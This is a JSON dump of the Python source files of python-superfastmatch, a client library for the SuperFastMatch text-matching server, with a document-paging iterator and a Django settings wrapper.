[ { "alpha_fraction": 0.5490516424179077, "alphanum_fraction": 0.5573904514312744, "avg_line_length": 31.02094268798828, "blob_id": "f8dc027f32d9ee0f0641e75e9417de4a63bcc635", "content_id": "e28c631f607d28e2f41a1bc616b71b97237324da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6116, "license_type": "no_license", "max_line_length": 133, "num_lines": 191, "path": "/superfastmatch/client.py", "repo_name": "silverasm/python-superfastmatch", "src_encoding": "UTF-8", "text": "\"\"\" Python library for interacting with SuperFastMatch server.\n\"\"\"\n\n__author__ = \"James Turk ([email protected])\"\n__version__ = \"0.1.0-dev\"\n__copyright__ = \"Copyright (c) 2011 Sunlight Labs\"\n__license__ = \"BSD\"\n\nimport logging\nimport urllib\nimport urlparse\nimport httplib\nimport httplib2\nimport json\nimport stream\n\n\nlog = logging.getLogger(__name__)\n\n\nclass SuperFastMatchError(Exception):\n \"\"\" Exception for SFM API errors \"\"\"\n def __init__(self, msg, status, expected_status, *args, **kwargs):\n super(SuperFastMatchError, self).__init__(msg, *args, **kwargs)\n self.status = status\n self.expected_status = expected_status\n\n\ndef parse_doctype_range(rangestr):\n \"\"\"Return a list of the doctypes in the range specified expanded as a list \n of integers. This is used to validate arguments. The actual range strings\n are passed onto the superfastmatch server.\n\n >>> parse_doctype_range('1-2:5:7-9')\n [1, 2, 5, 7, 8, 9]\n >>> parse_doctype_range('')\n >>> parse_doctype_range('1')\n [1]\n >>> parse_doctype_range('7-7')\n [7]\n \"\"\"\n if not rangestr:\n raise Exception('Invalid doctype range ({0})'.format(rangestr))\n\n split_on_hyphen = lambda s: s.split('-')\n\n def expand(rng):\n if len(rng) == 1:\n return int(rng[0])\n elif len(rng) == 2:\n return range(int(rng[0]), int(rng[1]) + 1)\n else:\n raise Exception('Unrecognized range data type')\n\n return (stream.Stream(rangestr.split(':'))\n >> stream.map(split_on_hyphen)\n >> stream.map(expand)\n >> stream.flatten\n >> list)\n\n\ndef ensure_sequence(arg):\n if hasattr(arg, 'strip'):\n return [arg]\n if hasattr(arg, '__getitem__'):\n return arg\n elif hasattr(arg, '__iter__'):\n return list(arg)\n else:\n return [arg]\n\n\nclass Client(object):\n\n\n def __init__(self, url='http://127.0.0.1:8080/', parse_response=True,\n username=None, password=None):\n self.url = url\n if not self.url.endswith('/'):\n self.url += '/'\n self._http = httplib2.Http()\n if username is not None and password is not None:\n self._http.add_credentials(username, password)\n self.parse_response = parse_response\n\n\n\n def _apicall(self, method, path, expected_status, params=''):\n expected_status = ensure_sequence(expected_status)\n\n if params:\n for (key, value) in params.iteritems():\n if isinstance(value, unicode):\n params[key] = value.encode('utf-8')\n params = urllib.urlencode(params, doseq=True)\n elif params == {}:\n params = ''\n uri = urlparse.urljoin(self.url, path)\n headers = {}\n if method == 'GET' and params:\n uri = uri + '?' + params\n params = None\n log.debug('httplib2.Http.request(uri={uri!r}, method={method!r}, params={params!r}, headers={headers!r})'.format(**locals()))\n resp, content = self._http.request(uri, method, params, headers)\n status = int(resp['status'])\n if status in expected_status:\n if self.parse_response == True:\n if resp['content-type'] in 'application/json':\n obj = json.loads(content)\n return obj\n return content\n else:\n tmpl = \"Unexpected HTTP status. 
Expecting {0!r} but got {1!r} on {2!r}\"\n msg = tmpl.format(str(expected_status), status, uri)\n raise SuperFastMatchError(msg, status, expected_status)\n\n\n def add(self, doctype, docid, text, defer=False, **kwargs):\n method = 'POST' if defer else 'PUT'\n kwargs['text'] = text\n return self._apicall(method, 'document/%s/%s/' % (doctype, docid),\n httplib.ACCEPTED, kwargs)\n\n\n def delete(self, doctype, docid):\n return self._apicall('DELETE', 'document/%s/%s/' % (doctype, docid),\n [httplib.ACCEPTED, httplib.NOT_FOUND])\n\n\n def get(self, doctype, docid):\n return self._apicall('GET', 'document/%s/%s/' % (doctype, docid),\n [httplib.OK, httplib.NOT_FOUND, httplib.NOT_MODIFIED],\n {})\n\n\n def associations(self, doctype=None, page=None):\n url = 'association/'\n if doctype is not None:\n url = '%s%s' % (url, doctype)\n params = {}\n if page is not None:\n params['cursor'] = page\n return self._apicall('GET', url, httplib.OK, params)\n\n\n def update_associations(self, doctype=None, doctype2=None, skip_validation=False):\n url = 'associations/'\n if doctype:\n if not skip_validation:\n parse_doctype_range(doctype)\n url = '%s%s/' % (url, doctype)\n if doctype2:\n if not skip_validation:\n parse_doctype_range(doctype2)\n url = '%s%s/' % (url, doctype2)\n return self._apicall('POST', url, httplib.ACCEPTED)\n\n\n def document(self, doctype, docid):\n url = 'document/%s/%s' % (doctype, docid)\n return self._apicall('GET', url, [httplib.OK, httplib.NOT_MODIFIED, httplib.NOT_FOUND])\n\n\n def documents(self, doctype=None, page=None, order_by=None, limit=None):\n url = 'document/'\n if doctype is not None:\n url = \"%s%s/\" % (url, doctype)\n params = {}\n if page is not None:\n params['cursor'] = page\n if order_by is not None:\n params['order_by'] = order_by\n if limit is not None:\n params['limit'] = limit\n return self._apicall('GET', url, httplib.OK, params)\n\n\n def search(self, text, doctype=None, **kwargs):\n url = 'search/'\n params = kwargs\n if text is not None:\n params['text'] = text\n if doctype:\n url = '%s/%s/' % (url, doctype)\n params['doctype'] = str(doctype)\n\n return self._apicall('POST', url, httplib.OK, params)\n\n\n def queue(self):\n return self._apicall('GET', 'queue/', httplib.OK)\n" }, { "alpha_fraction": 0.5897436141967773, "alphanum_fraction": 0.5920745730400085, "avg_line_length": 39, "blob_id": "aef6ed03de5c72c992203df9f114390edfe624ce", "content_id": "21eeacb8e6510b4d75c68a5d7906eb896773d5a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3003, "license_type": "no_license", "max_line_length": 138, "num_lines": 75, "path": "/superfastmatch/iterators.py", "repo_name": "silverasm/python-superfastmatch", "src_encoding": "UTF-8", "text": "import logging\nfrom .client import Client\n\nlog = logging.getLogger(__name__)\n\ndef maxindexof(l):\n return len(l) - 1\n\nclass DocumentIterator(object):\n \"\"\"Iterates through the documents on a superfastmatch server. The order is determined \n by the `order_by` argument. It should be the name of a metadata field, optionally prefixed\n by a hyphen (-) to indicate a reversal of the natural order. The `chunksize` option is\n available for optimization. It determines how many documents are retrieved from the server\n per request. 
The `doctype` argument can be used to limit the iteration to the a specific\n range of doctypes.\n \"\"\"\n\n def __init__(self, client, order_by, doctype=None, chunksize=100):\n assert isinstance(client, Client), 'The first argument to DocumentIterator() must be an instance of superfastmatch.client.Client.'\n self.client = client\n # response: the most recent response from the server\n self.response = None\n # chunk: a list of documents returned from the server\n self.chunk = None\n # index: the index into `chunk` of the previously-returned document\n self.index = None\n\n self.chunksize = chunksize\n self.doctype = doctype\n self.order_by = order_by\n\n def __iter__(self):\n return self\n\n def next(self):\n if self.chunk is None or self.index == maxindexof(self.chunk):\n self.fetch_chunk()\n else:\n self.index += 1\n return self.current()\n\n def current(self):\n if self.chunk is None or self.index is None:\n return None\n return self.chunk[self.index]\n\n def fetch_chunk(self):\n if self.response is None:\n log.debug('Fetching first chunk of size {limit} ordered by {order_by}'.format(\n limit=self.chunksize, order_by=self.order_by))\n response = self.client.documents(doctype=self.doctype,\n order_by=self.order_by,\n limit=self.chunksize)\n self.accept_response(response)\n\n else:\n next_cursor = self.response['cursors']['next']\n if next_cursor == u'':\n raise StopIteration()\n\n log.debug('Fetching chunk of size {limit} at {next_cursor} ordered by {order_by}'.format(\n limit=self.chunksize, next_cursor=next_cursor, order_by=self.order_by))\n response = self.client.documents(doctype=self.doctype, \n page=next_cursor, \n order_by=self.order_by,\n limit=self.chunksize)\n self.accept_response(response)\n\n def accept_response(self, response):\n if response['success'] == False or len(response['rows']) == 0:\n raise StopIteration()\n\n self.response = response\n self.chunk = response['rows']\n self.index = 0\n\n\n\n" }, { "alpha_fraction": 0.6573171019554138, "alphanum_fraction": 0.6585366129875183, "avg_line_length": 38, "blob_id": "f14398efd0956abfd72a7527cacb7bd32175e208", "content_id": "fedb4995e4290e3749a79e94b06e9884de4ea5a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 820, "license_type": "no_license", "max_line_length": 127, "num_lines": 21, "path": "/superfastmatch/djangoclient.py", "repo_name": "silverasm/python-superfastmatch", "src_encoding": "UTF-8", "text": "import superfastmatch.client\nfrom django.conf import settings\n\nclass Client(superfastmatch.client.Client):\n def __init__(self, confkey='default', *args, **kwargs):\n assert hasattr(settings, 'SUPERFASTMATCH'), \"You must configure the Django Superfastmatch client.\"\n assert confkey in settings.SUPERFASTMATCH, \"You must configure the '{0}' Django Superfastmatch client.\".format(confkey)\n\n def copy_setting(key):\n if key not in kwargs and key in settings.SUPERFASTMATCH[confkey]:\n kwargs[key] = settings.SUPERFASTMATCH[confkey][key]\n\n copy_setting('url')\n copy_setting('username')\n copy_setting('password')\n copy_setting('parse_response')\n\n super(Client, self).__init__(*args, **kwargs)\n\nif __name__ == \"__main__\":\n client = Client()\n\n" }, { "alpha_fraction": 0.8144329786300659, "alphanum_fraction": 0.8144329786300659, "avg_line_length": 26.714284896850586, "blob_id": "2a902a4f3e1bebaee8102b9aed704da921e317cb", "content_id": "b62955191b4085f45ddf44a94cbf8feedf06fd70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 52, "num_lines": 7, "path": "/superfastmatch/__init__.py", "repo_name": "silverasm/python-superfastmatch", "src_encoding": "UTF-8", "text": "from .client import Client\nfrom .client import SuperFastMatchError\ntry:\n from .djangoclient import Client as DjangoClient\nexcept ImportError:\n pass\nfrom .iterators import DocumentIterator\n" } ]
4
SYJINTW/TMIV_camera_position
https://github.com/SYJINTW/TMIV_camera_position
a72b1a9b00e95cfe448ce73c05f7d409ce90af35
038dcaa05fbcff936ac2eafe3295dc9fac605edb
c4d09be4eace89eb9ca444e23adf0202a6094bcb
refs/heads/master
2023-07-26T01:19:01.028254
2021-09-06T05:12:07
2021-09-06T05:12:07
400,394,289
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5137614607810974, "alphanum_fraction": 0.607798159122467, "avg_line_length": 21.842105865478516, "blob_id": "05620e406b931c847c7517f6453b3aa2ef74f175", "content_id": "e73545961f4aa79ea07c58a19a4f73ff4dfa1d38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": "no_license", "max_line_length": 107, "num_lines": 19, "path": "/group.py", "repo_name": "SYJINTW/TMIV_camera_position", "src_encoding": "UTF-8", "text": "import math\n\n# r = 2.75\n# angle = 0\n# step = 180/5\n# arr = []\n# while angle <= 180:\n# arr.append((round(r*math.sin(angle*math.pi/180),2), round(r*math.cos(angle*math.pi/180),2),angle-90))\n# angle = angle + step\n# print(arr)\n\nr = 4\nangle = 0\nstep = 180/12\narr = []\nwhile angle <= 180:\n arr.append((round(r*math.sin(angle*math.pi/180),2), round(r*math.cos(angle*math.pi/180),2),angle-90))\n angle = angle + step\nprint(arr)\n\n\n" }, { "alpha_fraction": 0.4914810061454773, "alphanum_fraction": 0.5273918509483337, "avg_line_length": 27.051469802856445, "blob_id": "17795e6d92627da4f3f54db7df46a3fa58dfd52e", "content_id": "c277191d65692de84245cd26780c8946ea097ae7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3815, "license_type": "no_license", "max_line_length": 148, "num_lines": 136, "path": "/show.py", "repo_name": "SYJINTW/TMIV_camera_position", "src_encoding": "UTF-8", "text": "\nimport math\nfrom matplotlib import colors\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# edit\ncamera_center = ['usr',1,0,0,0,0,90]\nfile_name = 'sixsix.csv'\noutput_name = 'output.csv'\n\n\n\ndef Normalize(data, center):\n return data[1]-center[0], data[2]-center[1], data[3]-center[2] \n\n# yaw, row, pitch to vector\ndef YRPtoVectorDir(yaw, pitch, row):\n x_dir = math.cos(yaw)*math.cos(pitch)\n y_dir = math.sin(yaw)*math.cos(pitch)\n z_dir = math.sin(pitch)\n return x_dir, y_dir, z_dir\n\n# u: usr\n# c: camera\ndef Rotate(u_data, c_data):\n c_xyz = np.array([[c_data[1]],\n [c_data[2]],\n [c_data[3]]])\n u_y, u_p, u_r = u_data[4]*math.pi/180, u_data[5]*math.pi/180, u_data[6]*math.pi/180\n\n # roll rotate x, pitch rotate y, yaw rotate z\n yaw_mat = np.array([[math.cos(u_y), -(math.sin(u_y)), 0],\n [math.sin(u_y), math.cos(u_y), 0],\n [0, 0, 1]\n ])\n pitch_mat = np.array([[math.cos(u_p), 0, -(math.sin(u_p))],\n [0, 1, 0],\n [math.sin(u_p), 0, math.cos(u_p)]\n ])\n roll_mat = np.array([[1, 0, 0],\n [0, math.cos(u_r), -(math.sin(u_r))],\n [0, math.sin(u_r), math.cos(u_r)]\n ])\n \n new_xyz = np.dot(yaw_mat, c_xyz)\n new_xyz = np.dot(pitch_mat, new_xyz)\n new_xyz = np.dot(roll_mat, new_xyz)\n \n new_y = c_data[4] + u_data[4]\n new_p = c_data[5] + u_data[5]\n new_r = c_data[6] + u_data[6]\n\n return round(new_xyz[0][0],2), round(new_xyz[1][0],2), round(new_xyz[2][0],2), round(new_y,2), round(new_p,2), round(new_r,2)\n\n\ndef Move(u_data, c_data):\n return float(c_data[1])+u_data[1], float(c_data[2])+u_data[2], float(c_data[3])+u_data[3]\n\ndef main():\n global camera_center\n global file_name\n global output_name\n\n # read data\n df = pd.read_csv(file_name)\n # values in pandas module will automatic change array into numpy array\n datas = df.values\n\n \n\n tmp_center = [float(datas[0][1]),float(datas[0][2]),float(datas[0][3])]\n\n for data in datas:\n data[1], data[2], data[3] = Normalize(data, tmp_center)\n\n\n for data in datas:\n # rotate\n data[1], data[2], 
data[3], data[4], data[5], data[6] = Rotate(camera_center, data)\n # move\n data[1], data[2], data[3] = Move(camera_center, data)\n\n # write csv\n pd.DataFrame(datas).to_csv(output_name,index=False,float_format='{:f}'.format,header=['name','x','y','z','yaw','pitch','row'], encoding='utf-8')\n\n for data in datas:\n # [name, x, y, z, y, r, p] to [name, x, y, z, x_dir, y_dir, z_dir]\n data[4], data[5], data[6] = YRPtoVectorDir(float(data[4])*math.pi/180, float(data[5])*math.pi/180, float(data[6])*math.pi/180)\n\n\n center = [float(datas[0][1]),float(datas[0][2]),float(datas[0][3])]\n datas = np.delete(datas, 0, 0)\n nums_datas = np.shape(datas)[0]\n\n x = []\n y = []\n z = []\n x_dir = []\n y_dir = []\n z_dir = []\n\n for data in datas:\n x.append(float(data[1]))\n y.append(float(data[2]))\n z.append(float(data[3]))\n x_dir.append(float(data[4]))\n y_dir.append(float(data[5]))\n z_dir.append(float(data[6]))\n\n\n # plot\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n cols = ['r', 'g', 'b']\n\n # center point\n ax.scatter(center[0],center[1],center[2],c=\"red\")\n # cameras\n quivers = ax.quiver(x,y,z,x_dir,y_dir,z_dir)\n\n # UI\n ax.set_xlim3d([-3.0, 3.0])\n ax.set_xlabel('X')\n\n ax.set_ylim3d([-3.0, 3.0])\n ax.set_ylabel('Y')\n\n ax.set_zlim3d([-3.0, 3.0])\n ax.set_zlabel('Z')\n\n plt.show()\n\nif __name__ == '__main__':\n main()" } ]
2
heber013/consumer-driven-contract-test
https://github.com/heber013/consumer-driven-contract-test
4653100163d0a43351d8bf6b00f34d9ff057e175
115a7c6c5b2f516a0ddb02315a9b2a11aa8f9cfc
a35ed331e0674cd173555e5a94a8758aad033ce9
refs/heads/master
2021-09-09T09:45:44.104760
2018-03-14T21:05:27
2018-03-14T21:05:27
124,950,491
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.7002497911453247, "alphanum_fraction": 0.7002497911453247, "avg_line_length": 32.38888931274414, "blob_id": "e554a5e69decf8930ab9e3bbb9fc3d4db256439a", "content_id": "c3661f85331e9ada6cde4abf249ffe1af6aa2731", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1201, "license_type": "no_license", "max_line_length": 157, "num_lines": 36, "path": "/README.rst", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "Consumer driven contract test using Pact\n########################################\nSample project to set up contract testing using `python implementation <https://github.com/pact-foundation/pact-python>`_ of `pact <https://docts.pact.io>`_.\n\nIn this example the Consumer is LoginService and the provider is UserService, both in the same repository for simplicity.\n\nPrerequisites\n-------------\n- Docker\n- Docker compose\n\nRun contract tests in consumer service\n--------------------------------------\nThe first part of contract testing is to run the tests on the consumer side in order to generate the pact files,\nthey are similar to unit tests with the difference that they use a mock service provided by pact\nand generate the pact files:\n\n::\n\n$ cd login_service\n$ docker-compose up --build\n\nIt will run the contract tests in a container and put the resulting pact files in:\n**consumer-driven-contract/pacts**\n\nVerify pacts in the provider service\n------------------------------------\nNow we have to verify that the actual provider service satisfies the contract generated by the consumer,\nin this example we use a docker pact verifier:\n\n::\n\n$ cd user_service\n$ docker-compose up --build\n\nVerify results." }, { "alpha_fraction": 0.7108433842658997, "alphanum_fraction": 0.7349397540092468, "avg_line_length": 10.857142448425293, "blob_id": "e7d02021e5c93cbb0d5ce40a59c24c5d3eacb6eb", "content_id": "e22afdccd88915ee76aa45fd7e07cef707befd2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 83, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/login_service/Dockerfile", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "FROM python:3.6\n\nADD . /login\n\nWORKDIR /login\n\nRUN pip install -r requirements.txt\n" }, { "alpha_fraction": 0.7075471878051758, "alphanum_fraction": 0.7264150977134705, "avg_line_length": 10.777777671813965, "blob_id": "845e929eb243a2281c1e89676da57a6f0d77e168", "content_id": "c3f961b3ed4b2e3b0744204687991771427b56b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 106, "license_type": "no_license", "max_line_length": 35, "num_lines": 9, "path": "/user_service/Dockerfile", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "FROM python:3.6\n\nADD . 
/users\n\nWORKDIR /users\n\nRUN pip install -r requirements.txt\n\nENTRYPOINT [\"python\"]\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 10.666666984558105, "blob_id": "ad4a695ba8c91a87b12e23a5194eb5d34e07f7cf", "content_id": "87783c8547b7bdbff49ad9c13fdbbbc38d922b53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 35, "license_type": "no_license", "max_line_length": 14, "num_lines": 3, "path": "/user_service/requirements.txt", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "flask\nflask-jsonpify\nflask-restful\n" }, { "alpha_fraction": 0.6643109321594238, "alphanum_fraction": 0.6890459656715393, "avg_line_length": 24.727272033691406, "blob_id": "b6ccefc0bf153f75b358fe4b9211eebb8f6ad43f", "content_id": "94c570986d2f98efe2b0fb538b21671ae5bec744", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 71, "num_lines": 11, "path": "/login_service/user.py", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "import requests\n\n\nUSERS_URL = 'http://localhost:5002/users/'\n\n\ndef get_user(username):\n \"\"\"Fetch a user object by user_name from the server.\"\"\"\n uri = USERS_URL + username\n response = requests.get(uri)\n return response.json() if response.status_code == 200 else response\n" }, { "alpha_fraction": 0.5599051117897034, "alphanum_fraction": 0.5776987075805664, "avg_line_length": 34.87234115600586, "blob_id": "0e65729e677add100442b90a2c3d4c7800929c1f", "content_id": "1a5fec665bc15ff2800b60e0bf302beb2ae586b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1686, "license_type": "no_license", "max_line_length": 95, "num_lines": 47, "path": "/login_service/contract_tests/test_user.py", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "import atexit\nimport unittest\nfrom unittest.mock import patch\n\nfrom pact import Consumer, Provider\n\nfrom user import get_user\n\npact = Consumer('LoginService').has_pact_with(Provider('UserService'),\n host_name='localhost',\n port=1234,\n pact_dir='pacts')\npact.start_service()\natexit.register(pact.stop_service)\n\n\nclass TestGetUserInfoContract(unittest.TestCase):\n\n def test_get_user(self):\n expected = {\"data\": [\"User1\", 123, \"Editor\"]}\n\n (pact\n .given('User1 exists and is not an administrator')\n .upon_receiving('a request for User1')\n .with_request('get', '/users/User1')\n .will_respond_with(200, body=expected))\n pact.setup()\n # Patch USERS_URL so that the service uses the mock server URL instead of the real URL.\n with patch.dict('user.__dict__', {'USERS_URL': 'http://localhost:1234/users/'}):\n result = get_user('User1')\n pact.verify()\n self.assertEqual(result, expected)\n\n def test_get_non_existing_user(self):\n expected = ''\n\n (pact\n .given('User2 does not exist')\n .upon_receiving('a request for User2')\n .with_request('get', '/users/User2')\n .will_respond_with(404, body=expected))\n pact.setup()\n # Patch USERS_URL so that the service uses the mock server URL instead of the real URL.\n with patch.dict('user.__dict__', {'USERS_URL': 'http://localhost:1234/users/'}):\n result = get_user('User2')\n pact.verify()\n self.assertEqual(result.text, expected)\n" }, { "alpha_fraction": 0.5933504104614258, "alphanum_fraction": 
0.6086956262588501, "avg_line_length": 23.957447052001953, "blob_id": "4975dfa22d9fe969cf8d9edf5bfd5a1248f315db", "content_id": "2268bb95a3d8afbcc93ee5f82972e820bd0c8142", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1173, "license_type": "no_license", "max_line_length": 77, "num_lines": 47, "path": "/user_service/provider_states.py", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "# STATES FOR TESTING\nimport json\n\nfrom flask import Flask, request, Response, jsonify\n\n\ndef prepare_state(state):\n\n def write_to_file(row):\n file_path = \"users.json\"\n with open(file_path, 'w') as _f:\n json.dump(row, _f)\n if state == STATES[0] or state == STATES[1]:\n write_to_file({\"data\": [\"User1\", 123, \"Editor\"]})\n else:\n print(\"State {} is not implemented\".format(state))\n\n\nSTATES = ['User1 exists and is not an administrator', 'User2 does not exist']\n\napp = Flask(__name__)\n\nSTATUS = {\n 'not_found': Response(status=404),\n 'ok': Response(status=200)\n}\n\n\[email protected]('/provider_states', methods=['GET'])\ndef states():\n return jsonify({\"LoginService\": STATES})\n\n\[email protected]('/provider_states/active', methods=['POST'])\ndef states_active():\n \"\"\" USAGE: python-verifier will send a request with the body:\n {consumer: 'Consumer name', states: ['a thing exists']}\n to this enpoint. One state at the time is allowed.\n \"\"\"\n data = request.get_json()\n prepare_state(data[\"state\"])\n\n return STATUS['ok']\n\n\nif __name__ == '__main__':\n app.run(host='testing_states', port=5000)\n" }, { "alpha_fraction": 0.5819581747055054, "alphanum_fraction": 0.6138613820075989, "avg_line_length": 20.162790298461914, "blob_id": "550bf34fc455553d22ade1d67a4d445735a31fcd", "content_id": "520f521cb6e133557fa172fb0f8a329043b1c1a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 909, "license_type": "no_license", "max_line_length": 82, "num_lines": 43, "path": "/user_service/docker-compose.yaml", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "version: \"3\"\nservices:\n api:\n build: .\n networks:\n pactnw: {}\n command: users.py\n volumes:\n - ./users.json:/users/users.json\n ports:\n - \"5002:5002\"\n\n testing_states:\n build: .\n networks:\n pactnw: {}\n command: provider_states.py\n volumes:\n - ./users.json:/users/users.json\n ports:\n - \"5000:5000\"\n\n pactverifier:\n image: dius/pact-provider-verifier-docker\n networks:\n pactnw: {}\n depends_on:\n - api\n - testing_states\n links:\n - api:api\n - testing_states:testing_states\n volumes:\n - ../pacts:/tmp/pacts\n environment:\n - pact_urls=/tmp/pacts/loginservice-userservice.json\n - provider_base_url=http://api:5002\n - provider_states_url=http://testing_states:5000/provider_states\n - provider_states_active_url=http://testing_states:5000/provider_states/active\n\nnetworks:\n pactnw:\n driver: bridge" }, { "alpha_fraction": 0.5634058117866516, "alphanum_fraction": 0.5797101259231567, "avg_line_length": 22, "blob_id": "b65e2ff77a4ee83fa0e01f751e83dcd6e6622e27", "content_id": "4d656ee88f68bcf1d1e2a710656b0ef62c99590a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 60, "num_lines": 24, "path": "/user_service/users.py", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "import 
json\n\nfrom flask import Flask, Response\nfrom flask_restful import Resource, Api\n\napp = Flask(__name__)\napi = Api(app)\n\n\nclass Users(Resource):\n\n def get(self, user_name):\n file_path = \"users.json\"\n with open(file_path, 'r') as _file:\n for line in _file:\n if json.loads(line)['data'][0] == user_name:\n return json.loads(line)\n return Response(status=404)\n\n\napi.add_resource(Users, '/users/<user_name>') # Route_1\n\nif __name__ == '__main__':\n app.run(host='api', port=5002)\n" } ]
9
jm33-m0/ctf-writeups
https://github.com/jm33-m0/ctf-writeups
993811b02da37f03454d546928d2dd094212537f
c9b051a2185cf4990b110e1357c97ea902b40871
01c9cb7f596c80f54cd5b0a7d2fc8115f0ecf008
refs/heads/master
2021-01-22T16:13:43.325951
2016-03-03T21:16:13
2016-03-03T21:16:13
53,498,029
1
0
null
2016-03-09T13:02:02
2016-03-03T21:16:23
2016-03-03T21:16:23
null
[ { "alpha_fraction": 0.619286835193634, "alphanum_fraction": 0.7125352025032043, "avg_line_length": 44.08839797973633, "blob_id": "399280f9754adbf338f196a090918b48a56122f9", "content_id": "234f1aef7618a6a12fcb6ce2c3d7cfd3b587a0d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8161, "license_type": "no_license", "max_line_length": 801, "num_lines": 181, "path": "/sickos-oscp-like.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "### Sick OS 1.1 CTF\n\nThe objective of [Sick OS CTF](http://www.vulnhub.com/entry/sickos-11,132/) is to get `/root/a0216ea4d51874464078c618298b1367.txt`.\n\nFurther information about CTF mentions that this CTF is similar to what one has to work with during OSCP course. Sounds like a fun.\n\nAfter reading the description and having run the given file on VMWare Player, I first wanted to know the IP Address.\n\nI didn't know a quickest way to identify my target IP address. I was on a network with 100s of PCs so I scanned through the `vmnet8` interface that VMWare must have created to see if it can give quick hint to me.\n```shell\n$ arp-scan --localnet --interface vmnet8\nInterface: vmnet8, datalink type: EN10MB (Ethernet)\nStarting arp-scan 1.8.1 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)\n172.16.8.254\t00:50:56:fc:f4:ff\tVMware, Inc.\n```\n\nNow, I know that the guests I run on VMWare might have VMWare, Inc. signature that would help me reduce the scope.\n\n```shell\n$ arp-scan --localnet --interface eno1 | grep \"VMware\"\n192.168.168.181\t00:0c:29:7b:51:b0\tVMware, Inc.\n```\n\nWe got the target IP now and I ran nmap against it.\n```shell\n$ nmap -A 192.168.168.181\n\nStarting Nmap 6.47 ( http://nmap.org ) at 2016-02-22 15:19 CST\nNmap scan report for 192.168.168.181\nHost is up (0.00022s latency).\nNot shown: 997 filtered ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)\n| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)\n|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)\n3128/tcp open http-proxy Squid http proxy 3.1.19\n|_http-methods: No Allow or Public header in OPTIONS response (status code 400)\n| http-open-proxy: Potentially OPEN proxy.\n|_Methods supported: GET HEAD\n|_http-title: ERROR: The requested URL could not be retrieved\n8080/tcp closed http-proxy\nMAC Address: 00:0C:29:7B:51:B0 (VMware)\nDevice type: general purpose\nRunning: Linux 3.X\nOS CPE: cpe:/o:linux:linux_kernel:3\nOS details: Linux 3.11 - 3.14\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 0.22 ms 192.168.168.181\n\nOS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 24.41 seconds\n```\n\nssh and squid, that looks interesting and 8080 but not accessible. But, hey did you see that 3128/tcp port is open and is potentially open proxy? I updated my firefox proxy settings to use this proxy and visited http://127.0.0.1 (You have to remove the entries of 127.0.0.1 and/or localhost from `No Proxies for:` textarea in Firefox settings).\n\n![Localhost](images/sickos-1.png?raw=true \"Localhost : Sick OS\")\n\nThat's good for us. I have a habit of usually loading `/robots.txt` before I run the tools like `nikto` or any other directory busting tools. 
